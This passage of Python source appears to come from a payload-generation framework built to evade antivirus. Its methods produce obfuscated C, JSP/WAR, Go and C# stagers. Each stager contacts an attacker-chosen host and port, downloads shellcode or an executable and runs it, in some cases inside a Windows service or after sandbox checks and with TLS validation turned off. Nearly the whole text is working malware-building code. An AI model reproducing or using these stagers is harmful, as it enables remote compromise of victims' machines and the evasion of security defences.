myZipFile = zipfile.ZipFile(war_file, 'w')
myZipFile.write(var_payload + ".jsp", var_payload + ".jsp",
zipfile.ZIP_DEFLATED)
myZipFile.write(var_hexfile + ".txt", var_hexfile + ".txt",
zipfile.ZIP_DEFLATED)
myZipFile.write("META-INF/MANIFEST.MF", "META-INF/MANIFEST.MF",
zipfile.ZIP_DEFLATED)
myZipFile.write("WEB-INF/web.xml", "WEB-INF/web.xml",
zipfile.ZIP_DEFLATED)
myZipFile.close()
with open(war_file, 'rb') as f:
payload_code = f.read()
# Clean up the individual files, you can always unzip the war to see them again
os.system("rm -rf WEB-INF")
os.system("rm -rf META-INF")
os.system("rm -f " + var_payload + ".jsp")
os.system("rm -f " + var_hexfile + ".txt")
os.system("rm -f " + war_file)
# Return
self.payload_source_code = payload_code
return
def generate(self):
sumvalue_name = evasion_helpers.randomString()
checksum_name = evasion_helpers.randomString()
winsock_init_name = evasion_helpers.randomString()
punt_name = evasion_helpers.randomString()
wsconnect_name = evasion_helpers.randomString()
# the real includes needed
includes = [
"#include <stdio.h>", "#include <stdlib.h>",
"#include <windows.h>", "#include <string.h>", "#include <time.h>"
]
# max length string for obfuscation
global_max_string_length = 10000
max_string_length = random.randint(100, global_max_string_length)
max_num_strings = 10000
# TODO: add in more string processing functions
randName1 = evasion_helpers.randomString() # reverse()
randName2 = evasion_helpers.randomString() # doubles characters
stringModFunctions = [
(randName1,
"char* %s(const char *t) { int length= strlen(t); int i; char* t2 = (char*)malloc((length+1) * sizeof(char)); for(i=0;i<length;i++) { t2[(length-1)-i]=t[i]; } t2[length] = '\\0'; return t2; }"
% (randName1)),
(randName2,
"char* %s(char* s){ char *result = malloc(strlen(s)*2+1); int i; for (i=0; i<strlen(s)*2+1; i++){ result[i] = s[i/2]; result[i+1]=s[i/2];} result[i] = '\\0'; return result; }"
% (randName2))
]
random.shuffle(stringModFunctions)
# obfuscation "logical nop" string generation functions
randString1 = evasion_helpers.randomString(50)
randName1 = evasion_helpers.randomString()
randVar1 = evasion_helpers.randomString()
randName2 = evasion_helpers.randomString()
randVar2 = evasion_helpers.randomString()
randVar3 = evasion_helpers.randomString()
randName3 = evasion_helpers.randomString()
randVar4 = evasion_helpers.randomString()
randVar5 = evasion_helpers.randomString()
stringGenFunctions = [
(randName1,
"char* %s(){ char *%s = %s(\"%s\"); return strstr( %s, \"%s\" );}"
% (randName1, randVar1, stringModFunctions[0][0], randString1,
randVar1, randString1[25])),
(randName2,
"char* %s(){ char %s[%s], %s[%s/2]; strcpy(%s,\"%s\"); strcpy(%s,\"%s\"); return %s(strcat( %s, %s)); }"
% (randName2, randVar2, max_string_length, randVar3,
max_string_length, randVar2, evasion_helpers.randomString(50),
randVar3, evasion_helpers.randomString(50),
stringModFunctions[1][0], randVar2, randVar3)),
(randName3,
"char* %s() { char %s[%s] = \"%s\"; char *%s = strupr(%s); return strlwr(%s); }"
%
(randName3, randVar4, max_string_length,
evasion_helpers.randomString(50), randVar5, randVar4, randVar5))
]
random.shuffle(stringGenFunctions)
# obfuscation - add in our fake includes
fake_includes = [
"#include <sys/timeb.h>", "#include <time.h>", "#include <math.h>",
"#include <signal.h>", "#include <stdarg.h>",
"#include <limits.h>", "#include <assert.h>"
]
for x in range(1, random.randint(1, 7)):
includes.append(fake_includes[x])
# shuffle up real/fake includes
random.shuffle(includes)
code = "#define _WIN32_WINNT 0x0500\n"
code += "#include <winsock2.h>\n"
code += "\n".join(includes) + "\n"
#real - service related headers (check the stub)
hStatusName = evasion_helpers.randomString()
serviceHeaders = [
"SERVICE_STATUS ServiceStatus;",
"SERVICE_STATUS_HANDLE %s;" % (hStatusName),
"void ServiceMain(int argc, char** argv);",
"void ControlHandler(DWORD request);"
]
random.shuffle(serviceHeaders)
code += "\n".join(serviceHeaders)
#string mod functions
code += stringModFunctions[0][1] + "\n"
code += stringModFunctions[1][1] + "\n"
# build the sumValue function
string_arg_name = evasion_helpers.randomString()
retval_name = evasion_helpers.randomString()
code += "int %s(char %s[]) {" % (sumvalue_name, string_arg_name)
code += "int %s=0; int i;" % (retval_name)
code += "for (i=0; i<strlen(%s);++i) %s += %s[i];" % (
string_arg_name, retval_name, string_arg_name)
code += "return (%s %% 256);}\n" % (retval_name)
# build the winsock_init function
wVersionRequested_name = evasion_helpers.randomString()
wsaData_name = evasion_helpers.randomString()
code += "void %s() {" % (winsock_init_name)
code += "WORD %s = MAKEWORD(%s, %s); WSADATA %s;" % (
wVersionRequested_name, evasion_helpers.obfuscateNum(
2, 4), evasion_helpers.obfuscateNum(2, 4), wsaData_name)
code += "if (WSAStartup(%s, &%s) < 0) { WSACleanup(); exit(1);}}\n" % (
wVersionRequested_name, wsaData_name)
# first logical nop string function
code += stringGenFunctions[0][1] + "\n"
# build punt function
my_socket_name = evasion_helpers.randomString()
code += "void %s(SOCKET %s) {" % (punt_name, my_socket_name)
code += "closesocket(%s);" % (my_socket_name)
code += "WSACleanup();"
code += "exit(1);}\n"
# second logical nop string function
code += stringGenFunctions[1][1] + "\n"
# build the reverse_http uri checksum function
randchars = ''.join(
random.sample(
"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789",
62))
characters_name = evasion_helpers.randomString()
string_var_name = evasion_helpers.randomString()
code += "char* %s(){" % (checksum_name)
code += "srand (time(NULL));int i;"
code += "char %s[] = \"%s\";" % (characters_name, randchars)
code += "char* %s = malloc(5); %s[4] = 0;" % (string_var_name,
string_var_name)
code += "while (1<2){for(i=0;i<3;++i){%s[i] = %s[rand() %% (sizeof(%s)-1)];}" % (
string_var_name, characters_name, characters_name)
code += "for(i=0;i<sizeof(%s);i++){ %s[3] = %s[i];" % (
characters_name, string_var_name, characters_name)
code += "if (%s(%s) == 92) return %s; } } return 0;}\n" % (
sumvalue_name, string_var_name, string_var_name)
# third logical nop string function
code += stringGenFunctions[2][1] + "\n"
# build wsconnect function
target_name = evasion_helpers.randomString()
sock_name = evasion_helpers.randomString()
my_socket_name = evasion_helpers.randomString()
code += "SOCKET %s() { struct hostent * %s; struct sockaddr_in %s; SOCKET %s;" % (
wsconnect_name, target_name, sock_name, my_socket_name)
code += "%s = socket(AF_INET, SOCK_STREAM, 0);" % (my_socket_name)
code += "if (%s == INVALID_SOCKET) %s(%s);" % (
my_socket_name, punt_name, my_socket_name)
code += "%s = gethostbyname(\"%s\");" % (
target_name, self.required_options["LHOST"][0])
code += "if (%s == NULL) %s(%s);" % (target_name, punt_name,
my_socket_name)
code += "memcpy(&%s.sin_addr.s_addr, %s->h_addr, %s->h_length);" % (
sock_name, target_name, target_name)
code += "%s.sin_family = AF_INET;" % (sock_name)
code += "%s.sin_port = htons(%s);" % (
sock_name,
evasion_helpers.obfuscateNum(
int(self.required_options["LPORT"][0]), 32))
code += "if ( connect(%s, (struct sockaddr *)&%s, sizeof(%s)) ) %s(%s);" % (
my_socket_name, sock_name, sock_name, punt_name, my_socket_name)
code += "return %s;}\n" % (my_socket_name)
# real - main() method for the service code
serviceName = evasion_helpers.randomString()
code += "void main() { SERVICE_TABLE_ENTRY ServiceTable[2];"
serviceTableEntries = [
"ServiceTable[0].lpServiceName = \"%s\";" % (serviceName),
"ServiceTable[0].lpServiceProc = (LPSERVICE_MAIN_FUNCTION)ServiceMain;",
"ServiceTable[1].lpServiceName = NULL;",
"ServiceTable[1].lpServiceProc = NULL;"
]
random.shuffle(serviceTableEntries)
code += "\n".join(serviceTableEntries)
code += "StartServiceCtrlDispatcher(ServiceTable);}\n"
# real - service status options for us to shuffle
serviceStatusOptions = [
"ServiceStatus.dwWin32ExitCode = 0;",
"ServiceStatus.dwCurrentState = SERVICE_START_PENDING;",
"ServiceStatus.dwWaitHint = 0;",
"ServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN;",
"ServiceStatus.dwServiceSpecificExitCode = 0;",
"ServiceStatus.dwCheckPoint = 0;",
"ServiceStatus.dwServiceType = SERVICE_WIN32;"
]
random.shuffle(serviceStatusOptions)
# real - serviceMain() code
code += "void ServiceMain(int argc, char** argv) {\n"
code += "\n".join(serviceStatusOptions)
code += "%s = RegisterServiceCtrlHandler( \"%s\", (LPHANDLER_FUNCTION)ControlHandler);" % (
hStatusName, serviceName)
code += "if (%s == (SERVICE_STATUS_HANDLE)0) return;" % (hStatusName)
code += "ServiceStatus.dwCurrentState = SERVICE_RUNNING;"
code += "SetServiceStatus (%s, &ServiceStatus);" % (hStatusName)
code += "while (ServiceStatus.dwCurrentState == SERVICE_RUNNING) {\n"
# build main() code
buffer_name = evasion_helpers.randomString()
my_socket_name = evasion_helpers.randomString()
request_buf_name = evasion_helpers.randomString()
buf_counter_name = evasion_helpers.randomString()
bytes_read_name = evasion_helpers.randomString()
# obfuscation stuff
char_array_name_1 = evasion_helpers.randomString()
number_of_strings_1 = random.randint(1, max_num_strings)
char_array_name_2 = evasion_helpers.randomString()
number_of_strings_2 = random.randint(1, max_num_strings)
char_array_name_3 = evasion_helpers.randomString()
number_of_strings_3 = random.randint(1, max_num_strings)
code += "char * %s; int i;" % (buffer_name)
# obfuscation
code += "char* %s[%s];" % (char_array_name_1, number_of_strings_1)
# malloc our first string obfuscation array
code += "for (i = 0; i < %s; ++i) %s[i] = malloc (%s);" % (
number_of_strings_1, char_array_name_1,
random.randint(max_string_length, global_max_string_length))
# call the winsock init function
code += "%s();" % (winsock_init_name)
# obfuscation
code += "char* %s[%s];" % (char_array_name_2, number_of_strings_2)
# create our socket
code += "SOCKET %s = %s();" % (my_socket_name, wsconnect_name)
# malloc our second string obfuscation array
code += "for (i = 0; i < %s; ++i) %s[i] = malloc (%s);" % (
number_of_strings_2, char_array_name_2,
random.randint(max_string_length, global_max_string_length))
# build and send the HTTP request to the handler
code += "char %s[200];" % (request_buf_name)
code += "sprintf(%s, \"GET /%%s HTTP/1.1\\r\\nAccept-Encoding: identity\\r\\nHost: %s:%s\\r\\nConnection: close\\r\\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.1; Windows NT\\r\\n\\r\\n\", %s());" % (
request_buf_name, self.required_options["LHOST"][0],
self.required_options["LPORT"][0], checksum_name)
code += "send(%s,%s, strlen( %s ),0);" % (
my_socket_name, request_buf_name, request_buf_name)
code += "Sleep(300);"
# TODO: obfuscate/randomize the size of the page allocated
code += "%s = VirtualAlloc(0, 1000000, MEM_COMMIT, PAGE_EXECUTE_READWRITE);" % (
buffer_name)
code += "char* %s[%s];" % (char_array_name_3, number_of_strings_3)
# first string obfuscation method
code += "for (i=0; i<%s; ++i){strcpy(%s[i], %s());}" % (
number_of_strings_1, char_array_name_1, stringGenFunctions[0][0])
# read the full server response into the buffer
code += "char * %s = %s;" % (buf_counter_name, buffer_name)
code += "int %s; do {" % (bytes_read_name)
code += "%s = recv(%s, %s, 1024, 0);" % (
bytes_read_name, my_socket_name, buf_counter_name)
code += "%s += %s; }" % (buf_counter_name, bytes_read_name)
code += "while ( %s > 0 );" % (bytes_read_name)
# malloc our third string obfuscation array
code += "for (i = 0; i < %s; ++i) %s[i] = malloc (%s);" % (
number_of_strings_3, char_array_name_3,
random.randint(max_string_length, global_max_string_length))
# second string obfuscation method
code += "for (i=0; i<%s; ++i){strcpy(%s[i], %s());}" % (
number_of_strings_2, char_array_name_2, stringGenFunctions[1][0])
# real code
code += "closesocket(%s); WSACleanup();" % (my_socket_name)
code += "((void (*)())strstr(%s, \"\\r\\n\\r\\n\") + 4)();" % (
buffer_name)
# third string obfuscation method (never called)
code += "for (i=0; i<%s; ++i){strcpy(%s[i], %s());}" % (
number_of_strings_3, char_array_name_3, stringGenFunctions[2][0])
code += "} return; }\n"
# service control handler code
code += """void ControlHandler(DWORD request)
{
switch(request)
{
case SERVICE_CONTROL_STOP:
ServiceStatus.dwWin32ExitCode = 0;
ServiceStatus.dwCurrentState = SERVICE_STOPPED;
SetServiceStatus (%s, &ServiceStatus);
return;
case SERVICE_CONTROL_SHUTDOWN:
ServiceStatus.dwWin32ExitCode = 0;
ServiceStatus.dwCurrentState = SERVICE_STOPPED;
SetServiceStatus (%s, &ServiceStatus);
return;
default:
break;
}
SetServiceStatus (%s, &ServiceStatus);
return;
}
""" % (hStatusName, hStatusName, hStatusName)
self.payload_source_code = code
return
def generate(self):
# Set up all our variables
var_hexpath = evasion_helpers.randomString()
var_exepath = evasion_helpers.randomString()
var_data = evasion_helpers.randomString()
var_inputstream = evasion_helpers.randomString()
var_outputstream = evasion_helpers.randomString()
var_numbytes = evasion_helpers.randomString()
var_bytearray = evasion_helpers.randomString()
var_bytes = evasion_helpers.randomString()
var_counter = evasion_helpers.randomString()
var_char1 = evasion_helpers.randomString()
var_char2 = evasion_helpers.randomString()
var_comb = evasion_helpers.randomString()
var_exe = evasion_helpers.randomString()
var_hexfile = evasion_helpers.randomString()
var_proc = evasion_helpers.randomString()
var_name = evasion_helpers.randomString()
var_payload = evasion_helpers.randomString()
random_war_name = evasion_helpers.randomString()
# Variables for path to our executable input and war output
ORIGINAL_EXE = self.required_options["ORIGINAL_EXE"][0]
war_file = settings.PAYLOAD_COMPILED_PATH + random_war_name + ".war"
try:
# read in the executable
with open(ORIGINAL_EXE, 'rb') as orig_binary:
raw = orig_binary.read()
txt_exe = hexlify(raw)
txt_payload_file = open(var_hexfile + ".txt", 'wb')
txt_payload_file.write(txt_exe)
txt_payload_file.close()
except IOError:
print(helpers.color("\n [!] ORIGINAL_EXE file \"" + ORIGINAL_EXE + "\" not found\n", warning=True))
return ""
# Set up our JSP files used for triggering the payload within the war file
jsp_payload = "<%@ page import=\"java.io.*\" %>\n"
jsp_payload += "<%\n"
jsp_payload += "String " + var_hexpath + " = application.getRealPath(\"/\") + \"" + var_hexfile + ".txt\";\n"
jsp_payload += "String " + var_exepath + " = System.getProperty(\"java.io.tmpdir\") + \"/" + var_exe + "\";\n"
jsp_payload += "String " + var_data + " = \"\";\n"
jsp_payload += "if (System.getProperty(\"os.name\").toLowerCase().indexOf(\"windows\") != -1){\n"
jsp_payload += var_exepath + " = " + var_exepath + ".concat(\".exe\");\n"
jsp_payload += "}\n"
jsp_payload += "FileInputStream " + var_inputstream + " = new FileInputStream(" + var_hexpath + ");\n"
jsp_payload += "FileOutputStream " + var_outputstream + " = new FileOutputStream(" + var_exepath + ");\n"
jsp_payload += "int " + var_numbytes + " = " + var_inputstream + ".available();\n"
jsp_payload += "byte " + var_bytearray + "[] = new byte[" + var_numbytes + "];\n"
jsp_payload += var_inputstream + ".read(" + var_bytearray + ");\n"
jsp_payload += var_inputstream + ".close();\n"
jsp_payload += "byte[] " + var_bytes + " = new byte[" + var_numbytes + "/2];\n"
jsp_payload += "for (int " + var_counter + " = 0; " + var_counter + " < " + var_numbytes + "; " + var_counter + " += 2)\n"
jsp_payload += "{\n"
jsp_payload += "char " + var_char1 + " = (char) " + var_bytearray + "[" + var_counter + "];\n"
jsp_payload += "char " + var_char2 + " = (char) " + var_bytearray + "[" + var_counter+ " + 1];\n"
jsp_payload += "int " + var_comb + " = Character.digit(" + var_char1 + ", 16) & 0xff;\n"
jsp_payload += var_comb + " <<= 4;\n"
jsp_payload += var_comb + " += Character.digit(" + var_char2 + ", 16) & 0xff;\n"
jsp_payload += var_bytes + "[" + var_counter + "/2] = (byte)" + var_comb + ";\n"
jsp_payload += "}\n"
jsp_payload += var_outputstream + ".write(" + var_bytes + ");\n"
jsp_payload += var_outputstream + ".close();\n"
jsp_payload += "Process " + var_proc + " = Runtime.getRuntime().exec(" + var_exepath + ");\n"
jsp_payload += "%>\n"
# Write out the jsp code to file
with open(var_payload + ".jsp", 'w') as jsp_file_out:
jsp_file_out.write(jsp_payload)
# MANIFEST.MF file contents, and write it out to disk
manifest_file = "Manifest-Version: 1.0\r\nCreated-By: 1.6.0_17 (Sun Microsystems Inc.)\r\n\r\n"
with open("MANIFEST.MF", 'w') as man_file:
man_file.write(manifest_file)
# web.xml file contents
web_xml_contents = "<?xml version=\"1.0\"?>\n"
web_xml_contents += "<!DOCTYPE web-app PUBLIC\n"
web_xml_contents += "\"-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN\"\n"
web_xml_contents += "\"http://java.sun.com/dtd/web-app_2_3.dtd\">\n"
web_xml_contents += "<web-app>\n"
web_xml_contents += "<servlet>\n"
web_xml_contents += "<servlet-name>" + var_name + "</servlet-name>\n"
web_xml_contents += "<jsp-file>/" + var_payload + ".jsp</jsp-file>\n"
web_xml_contents += "</servlet>\n"
web_xml_contents += "</web-app>\n"
# Write the web.xml file to disk
with open("web.xml", 'w') as xml_file:
xml_file.write(web_xml_contents)
# Create the directories needed for the war file, and move the needed files into them
os.system("mkdir -p META-INF")
os.system("mkdir -p WEB-INF")
os.system("mv -f web.xml WEB-INF/")
os.system("mv -f MANIFEST.MF META-INF/")
# Make the war file by zipping everything together
myZipFile = zipfile.ZipFile(war_file, 'w')
myZipFile.write(var_payload + ".jsp", var_payload + ".jsp", zipfile.ZIP_DEFLATED)
myZipFile.write(var_hexfile + ".txt", var_hexfile + ".txt", zipfile.ZIP_DEFLATED)
myZipFile.write("META-INF/MANIFEST.MF", "META-INF/MANIFEST.MF", zipfile.ZIP_DEFLATED)
myZipFile.write("WEB-INF/web.xml", "WEB-INF/web.xml", zipfile.ZIP_DEFLATED)
myZipFile.close()
with open(war_file, 'rb') as f:
payload_code = f.read()
# Clean up the individual files, you can always unzip the war to see them again
os.system("rm -rf WEB-INF")
os.system("rm -rf META-INF")
os.system("rm -f " + var_payload + ".jsp")
os.system("rm -f " + var_hexfile + ".txt")
os.system("rm -f " + war_file)
# Return
self.payload_source_code = payload_code
return
def generate(self):
memCommit = evasion_helpers.randomString()
memReserve = evasion_helpers.randomString()
pageExecRW = evasion_helpers.randomString()
kernel32 = evasion_helpers.randomString()
procVirtualAlloc = evasion_helpers.randomString()
base64Url = evasion_helpers.randomString()
size = evasion_helpers.randomString()
err = evasion_helpers.randomString()
randBase = evasion_helpers.randomString()
length = evasion_helpers.randomString()
foo = evasion_helpers.randomString()
random = evasion_helpers.randomString()
outp = evasion_helpers.randomString()
i = evasion_helpers.randomString()
randTextBase64URL = evasion_helpers.randomString()
getURI = evasion_helpers.randomString()
sumVar = evasion_helpers.randomString()
checksum8 = evasion_helpers.randomString()
uri = evasion_helpers.randomString()
value = evasion_helpers.randomString()
hostAndPort = evasion_helpers.randomString()
port = self.required_options["LPORT"][0]
host = self.required_options["LHOST"][0]
response = evasion_helpers.randomString()
uriLength = randint(5, 255)
payload = evasion_helpers.randomString()
bufferVar = evasion_helpers.randomString()
x = evasion_helpers.randomString()
heapcreatevariable = evasion_helpers.randomString()
heapallocvariable = evasion_helpers.randomString()
heapcreateout = evasion_helpers.randomString()
allocvarout = evasion_helpers.randomString()
errorvariable = evasion_helpers.randomString()
errorvariabledos = evasion_helpers.randomString()
cust_func = evasion_helpers.randomString()
# sandbox check code
sandbox_checks, num_curlys = gamemaker.senecas_games(self)
payload_code = "package main\nimport (\n\"syscall\"\n\"unsafe\"\n"
payload_code += "\"io/ioutil\"\n\"math/rand\"\n\"net/http\"\n\"time\"\n"
if self.required_options["PROCESSORS"][0].lower() != "x":
payload_code += "\"runtime\"\n"
# Add in other imports based on checks being performed
if self.required_options["USERNAME"][0].lower() != "x":
payload_code += "\"strings\"\n\"os/user\"\n"
if self.required_options["MINPROCS"][0].lower() != "x":
payload_code += "\"os\"\n"
if self.required_options["HOSTNAME"][0].lower() != "x" or self.required_options["PROCCHECK"][0].lower() != 'false':
if "strings" not in payload_code:
payload_code += "\"strings\"\n"
if self.required_options["SLEEP"][0].lower() != "x":
payload_code += "\"net\"\n\"encoding/binary\"\n"
if self.required_options["BADMACS"][0].lower() != 'false':
if "net" not in payload_code:
payload_code += "\"net\"\n"
if "strings" not in payload_code:
payload_code += "\"strings\"\n"
payload_code += ")\n"
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
payload_code += "const (\n"
payload_code += "%s = 0x1000\n" % (memCommit)
payload_code += "%s = 0x2000\n" % (memReserve)
payload_code += "%s = 0x40\n)\n" % (pageExecRW)
payload_code += "var (\n"
payload_code += "%s = \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_\"\n" %(base64Url)
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
payload_code += "%s = syscall.NewLazyDLL(\"kernel32.dll\")\n" % (kernel32)
payload_code += "%s = %s.NewProc(\"VirtualAlloc\")\n)\n" % (procVirtualAlloc, kernel32)
payload_code += "func %s(%s uintptr) (uintptr, error) {\n" % (cust_func, size)
payload_code += "%s, _, %s := %s.Call(0, %s, %s|%s, %s)\n" % (allocvarout, err, procVirtualAlloc, size, memReserve, memCommit, pageExecRW)
payload_code += "if %s == 0 {\nreturn 0, %s\n}\nreturn %s, nil\n}\n" % (allocvarout, err, allocvarout)
elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
payload_code += kernel32 + " = syscall.NewLazyDLL(\"kernel32.dll\")\n"
payload_code += heapcreatevariable + " = " + kernel32 + ".NewProc(\"HeapCreate\")\n"
payload_code += heapallocvariable + " = " + kernel32 + ".NewProc(\"HeapAlloc\")\n)\n"
payload_code += "func %s(%s uintptr) (uintptr, error) {\n" % (cust_func, size)
payload_code += heapcreateout + ", _, " + errorvariable + " := " + heapcreatevariable + ".Call(0x00040000, " + size + ", 0)\n"
payload_code += allocvarout + ", _, " + errorvariabledos + " := " + heapallocvariable + ".Call(" + heapcreateout + ", 0x00000008, " + size + ")\n"
payload_code += "if %s == 0 {\nreturn 0, %s\n}\nreturn %s, nil\n}\n" % (allocvarout, err, allocvarout)
payload_code += "func %s(%s int, %s []byte) string {\n" % (randBase, length, foo)
payload_code += "%s := rand.New(rand.NewSource(time.Now().UnixNano()))\n" % (random)
payload_code += "var %s []byte\n" % (outp)
payload_code += "for %s := 0; %s < %s; %s++ {\n" % (i, i, length, i)
payload_code += "%s = append(%s, %s[%s.Intn(len(%s))])\n}\n" % (outp, outp, foo, random, foo)
payload_code += "return string(%s)\n}\n" % (outp)
payload_code += "func %s(%s int) string {\n" % (randTextBase64URL, length)
payload_code += "%s := []byte(%s)\n" % (foo, base64Url)
payload_code += "return %s(%s, %s)\n}\n" % (randBase, length, foo)
payload_code += "func %s(%s, %s int) string {\n" % (getURI, sumVar, length)
payload_code += "for {\n%s := 0\n%s := %s(%s)\n" % (checksum8, uri, randTextBase64URL, length)
payload_code += "for _, %s := range []byte(%s) {\n%s += int(%s)\n}\n" % (value, uri, checksum8, value)
payload_code += "if %s%s == %s {\nreturn \"/\" + %s\n}\n}\n}\n" % (checksum8, '%0x100', sumVar, uri)
payload_code += "func main() {\n"
# Sandbox code goes here
if sandbox_checks != '':
payload_code += sandbox_checks
payload_code += "%s := \"http://%s:%s\"\n" % (hostAndPort, host, port)
payload_code += "%s, _ := http.Get(%s + %s(92, %s))\n" % (response, hostAndPort, getURI, uriLength)
payload_code += "defer %s.Body.Close()\n" % (response)
payload_code += "%s, _ := ioutil.ReadAll(%s.Body)\n" % (payload, response)
payload_code += "%s, _ := %s(uintptr(len(%s)))\n" % (allocvarout, cust_func, payload)
payload_code += "%s := (*[990000]byte)(unsafe.Pointer(%s))\n" % (bufferVar, allocvarout)
payload_code += "for %s, %s := range %s {\n" % (x, value, payload)
payload_code += "%s[%s] = %s\n}\n" % (bufferVar, x, value)
payload_code += "syscall.Syscall(%s, 0, 0, 0, 0)\n}\n" % (allocvarout)
payload_code += '}' * num_curlys
self.payload_source_code = payload_code
return
def generate(self):
# imports and namespace setup
payload_code = "using System; using System.Net; using System.Net.Sockets; using System.Linq; using System.Runtime.InteropServices; using System.Threading;\n"
payload_code += "namespace %s { class %s {\n" % (evasion_helpers.randomString(), evasion_helpers.randomString())
# code for the randomString() function
randomStringName = evasion_helpers.randomString()
bufferName = evasion_helpers.randomString()
charsName = evasion_helpers.randomString()
t = list("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789")
random.shuffle(t)
chars = ''.join(t)
# logic to turn off certificate validation
validateServerCertficateName = evasion_helpers.randomString()
payload_code += "private static bool %s(object sender, System.Security.Cryptography.X509Certificates.X509Certificate cert,System.Security.Cryptography.X509Certificates.X509Chain chain,System.Net.Security.SslPolicyErrors sslPolicyErrors) { return true; }\n" %(validateServerCertficateName)
# code for the randomString() method
payload_code += "static string %s(Random r, int s) {\n" %(randomStringName)
payload_code += "char[] %s = new char[s];\n"%(bufferName)
payload_code += "string %s = \"%s\";\n" %(charsName, chars)
payload_code += "for (int i = 0; i < s; i++){ %s[i] = %s[r.Next(%s.Length)];}\n" %(bufferName, charsName, charsName)
payload_code += "return new string(%s);}\n" %(bufferName)
# code for the checksum8() function
checksum8Name = evasion_helpers.randomString()
payload_code += "static bool %s(string s) {return ((s.ToCharArray().Select(x => (int)x).Sum()) %% 0x100 == 92);}\n" %(checksum8Name)
# code fo the genHTTPChecksum() function
genHTTPChecksumName = evasion_helpers.randomString()
baseStringName = evasion_helpers.randomString()
randCharsName = evasion_helpers.randomString()
urlName = evasion_helpers.randomString()
random.shuffle(t)
randChars = ''.join(t)
randomReturn = evasion_helpers.randomString(4)
payload_code += "static string %s(Random r) { string %s = \"\";\n" %(genHTTPChecksumName,baseStringName)
payload_code += "for (int i = 0; i < 64; ++i) { %s = %s(r, 3);\n" %(baseStringName,randomStringName)
payload_code += "string %s = new string(\"%s\".ToCharArray().OrderBy(s => (r.Next(2) %% 2) == 0).ToArray());\n" %(randCharsName,randChars)
payload_code += "for (int j = 0; j < %s.Length; ++j) {\n" %(randCharsName)
payload_code += "string %s = %s + %s[j];\n" %(urlName,baseStringName,randCharsName)
payload_code += "if (%s(%s)) {return %s;}}} return \"%s\";}"%(checksum8Name,urlName, urlName, randomReturn)
# code for getData() function
getDataName = evasion_helpers.randomString()
strName = evasion_helpers.randomString()
webClientName = evasion_helpers.randomString()
sName = evasion_helpers.randomString()
payload_code += "static byte[] %s(string %s) {\n" %(getDataName,strName)
payload_code += "ServicePointManager.ServerCertificateValidationCallback = %s;\n" %(validateServerCertficateName)
payload_code += "WebClient %s = new System.Net.WebClient();\n" %(webClientName)
# Proxy
if self.required_options["PROXY"][0].lower() == "y":
defaultWebProxyName = evasion_helpers.randomString()
payload_code += "IWebProxy %s = WebRequest.DefaultWebProxy;\n" %(defaultWebProxyName)
payload_code += "%s.Credentials = CredentialCache.DefaultCredentials;\n" %(defaultWebProxyName)
payload_code += "%s.Proxy = %s;\n" %(webClientName, defaultWebProxyName)
payload_code += "%s.Headers.Add(\"User-Agent\", \"Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\");\n" %(webClientName)
payload_code += "%s.Headers.Add(\"Accept\", \"*/*\");\n" %(webClientName)
payload_code += "%s.Headers.Add(\"Accept-Language\", \"en-gb,en;q=0.5\");\n" %(webClientName)
payload_code += "%s.Headers.Add(\"Accept-Charset\", \"ISO-8859-1,utf-8;q=0.7,*;q=0.7\");\n" %(webClientName)
payload_code += "byte[] %s = null;\n" %(sName)
payload_code += "try { %s = %s.DownloadData(%s);\n" %(sName, webClientName, strName)
payload_code += "if (%s.Length < 100000) return null;}\n" %(sName)
payload_code += "catch (WebException) {}\n"
payload_code += "return %s;}\n" %(sName)
# code fo the inject() function to inject shellcode
injectName = evasion_helpers.randomString()
sName = evasion_helpers.randomString()
funcAddrName = evasion_helpers.randomString()
hThreadName = evasion_helpers.randomString()
threadIdName = evasion_helpers.randomString()
pinfoName = evasion_helpers.randomString()
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
payload_code += "static void %s(byte[] %s) {\n" %(injectName, sName)
payload_code += " if (%s != null) {\n" %(sName)
payload_code += " UInt32 %s = VirtualAlloc(0, (UInt32)%s.Length, 0x1000, 0x40);\n" %(funcAddrName, sName)
payload_code += " Marshal.Copy(%s, 0, (IntPtr)(%s), %s.Length);\n" %(sName,funcAddrName, sName)
payload_code += " IntPtr %s = IntPtr.Zero;\n" %(hThreadName)
payload_code += " UInt32 %s = 0;\n" %(threadIdName)
payload_code += " IntPtr %s = IntPtr.Zero;\n" %(pinfoName)
payload_code += " %s = CreateThread(0, 0, %s, %s, 0, ref %s);\n" %(hThreadName, funcAddrName, pinfoName, threadIdName)
payload_code += " WaitForSingleObject(%s, 0xFFFFFFFF); }}\n" %(hThreadName)
elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
payload_code += "static void %s(byte[] %s) {\n" %(injectName, sName)
payload_code += " if (%s != null) {\n" %(sName)
payload_code += ' UInt32 {} = HeapCreate(0x00040000, (UInt32){}.Length, 0);\n'.format(pinfoName, sName)
payload_code += ' UInt32 {} = HeapAlloc({}, 0x00000008, (UInt32){}.Length);\n'.format(funcAddrName, pinfoName, sName)
payload_code += ' RtlMoveMemory({}, {}, (UInt32){}.Length);\n'.format(funcAddrName, sName, sName)
payload_code += ' UInt32 {} = 0;\n'.format(threadIdName)
payload_code += ' IntPtr {} = CreateThread(0, 0, {}, IntPtr.Zero, 0, ref {});\n'.format(hThreadName, funcAddrName, threadIdName)
payload_code += ' WaitForSingleObject({}, 0xFFFFFFFF);}}}}\n'.format(hThreadName)
# code for Main() to launch everything
sName = evasion_helpers.randomString()
randomName = evasion_helpers.randomString()
curlyCount = 0
payload_code += "static void Main(){\n"
payload_code2, curlyCount = gamemaker.senecas_games(self)
payload_code = payload_code + payload_code2
payload_code += "Random %s = new Random((int)DateTime.Now.Ticks);\n" %(randomName)
payload_code += "byte[] %s = %s(\"https://%s:%s/\" + %s(%s));\n" %(sName, getDataName, self.required_options["LHOST"][0],self.required_options["LPORT"][0],genHTTPChecksumName,randomName)
payload_code += "%s(%s);}\n" %(injectName, sName)
while (curlyCount != 0):
